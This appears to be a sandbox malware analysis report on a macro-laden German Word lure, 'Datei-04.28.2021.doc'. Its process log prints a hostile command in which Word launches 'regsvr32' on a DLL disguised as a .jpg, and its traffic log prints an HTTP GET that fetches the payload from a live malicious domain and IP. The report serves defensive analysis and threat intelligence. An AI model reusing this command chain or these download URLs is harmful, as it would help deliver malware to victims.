Loading ...

Play interactive tourEdit tour

Analysis Report Datei-04.28.2021.doc

Overview

General Information

Sample Name:Datei-04.28.2021.doc
Analysis ID:399362
MD5:6747583727ce069aa8ae9d398d35e5bc
SHA1:97667bf552bf5557666b5266003b0411bc1669bc
SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
Infos:

Most interesting Screenshot:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Register DLL with spoofed extension
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2344 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • WINWORD.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • regsvr32.exe (PID: 2328 cmdline: regsvr32 c:\programdata\argumentSelectTmp.jpg MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Register DLL with spoofed extensionShow sources
Source: Process startedAuthor: Joe Security: Data: Command: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1552, ProcessCommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, ProcessId: 2328

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Machine Learning detection for sampleShow sources
Source: Datei-04.28.2021.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: better-transport-2008.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.142.215.160:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.142.215.160:80
Source: global trafficHTTP traffic detected: GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: better-transport-2008.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B02F65D-537D-406E-B057-1B1541B1D39D}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: better-transport-2008.comConnection: Keep-Alive
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: better-transport-2008.com
Source: vbaProject.binString found in binary or memory: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2093810327.0000000003A30000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000004.00000002.2092951876.0000000001CD0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2093810327.0000000003A30000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Inhalt aktivieren". a S nmmm O I @ 100% G) A GE)
Source: Screenshot number: 8Screenshot OCR: Bearbeitung aktivieren' in der oberen Leiste und dann auf ,,Inhalt aktivieren". a S nmmm O
Source: Document image extraction number: 0Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 0Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Source: Document image extraction number: 1Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 1Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Source: Datei-04.28.2021.docOLE, VBA macro line: Sub autoopen()
Source: Datei-04.28.2021.docOLE indicator, VBA macros: true
Source: Datei-04.28.2021.docOLE indicator has summary info: false
Source: Datei-04.28.2021.docOLE indicator application name: unknown
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal64.expl.winDOC@4/12@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$tei-04.28.2021.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB2BB.tmpJump to behavior
Source: Datei-04.28.2021.docOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 2876Thread sleep time: -60000s >= -30000s

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Datei-04.28.2021.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/40%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
better-transport-2008.com
45.142.215.160
truefalse
    unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
